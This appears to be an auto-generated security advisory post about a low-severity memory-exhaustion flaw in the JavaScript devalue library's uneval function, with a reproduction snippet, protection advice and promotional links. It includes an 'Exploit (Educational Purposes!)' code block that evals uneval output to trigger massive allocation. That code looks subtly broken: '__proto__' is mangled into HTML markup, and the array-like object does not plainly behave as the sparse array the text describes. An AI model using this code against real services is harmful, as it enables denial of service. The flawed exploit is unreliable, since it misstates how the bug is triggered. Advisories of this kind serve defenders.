devalue: Sparse arrays emitted by uneval cause eager allocation when evaluated (CVE: N/A) -DC-Oct2026-2697

Listen to this Post

devalue is a JavaScript library that serializes values into strings when JSON.stringify is not sufficient. Its uneval function generates JavaScript code that, when evaluated, recreates the original value. When uneval processes a sparse array—an array with a large declared length but few actual elements—it emits code that, upon evaluation, causes the JavaScript engine to eagerly allocate a contiguous backing store proportional to the declared length. A tiny serialized value can therefore trigger a massive memory allocation in the consuming runtime. This occurs during the evaluation of the generated code, not during the default devalue.parse sparse-array construction. An application is only affected if it serializes very large sparse arrays using uneval and then evaluates the resulting code. In the typical use case of sending data to the client, the worst outcome is a browser tab running out of memory. The vulnerability is difficult to exploit because an attacker must first cause the creation of a sparse array on the server, which is impossible in every mainstream wire format, and then that array must be passed through uneval and the output evaluated. The issue was fixed by avoiding eager allocation when evaluating sparse arrays emitted by uneval.

DailyCVE Form:

Platform: devalue
Version: < 5.9.4
Vulnerability: Sparse array allocation
Severity: Low
date: Sep 18, 2026

Prediction: Oct 2026

What Undercode Say:

npm install [email protected]
import { uneval } from 'devalue';
const sparse = [];
sparse.length = 100000000; // 100 million
const code = uneval(sparse);
// code evaluates to: [,,,,,...] with 100 million holes
eval(code); // eager allocation of ~800 MB

Exploit: (Educational Purposes!)

// Server-side code that unevals user-influenced data
import { uneval } from 'devalue';
function processUserData(data) {
const code = uneval(data);
// Send code to a client or eval it locally
return eval(code); // Vulnerable evaluation
}
// Attacker supplies a sparse array via a custom protocol
const malicious = { length: 100000000 };
malicious.<strong>proto</strong> = Array.prototype;
processUserData(malicious); // Triggers massive allocation

Protection: from this CVE

Update devalue to version 5.9.4 or later. Avoid evaluating uneval output from untrusted sources. Validate array lengths before serialization. Use devalue.parse instead of evaluating generated code when possible.

Impact:

A remote attacker who can influence data passed to uneval and cause the output to be evaluated can trigger excessive memory allocation, leading to a denial of service through process or browser tab crashes. The attack requires the ability to create a sparse array on the server, which is impractical in most real-world scenarios, resulting in a low severity rating.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top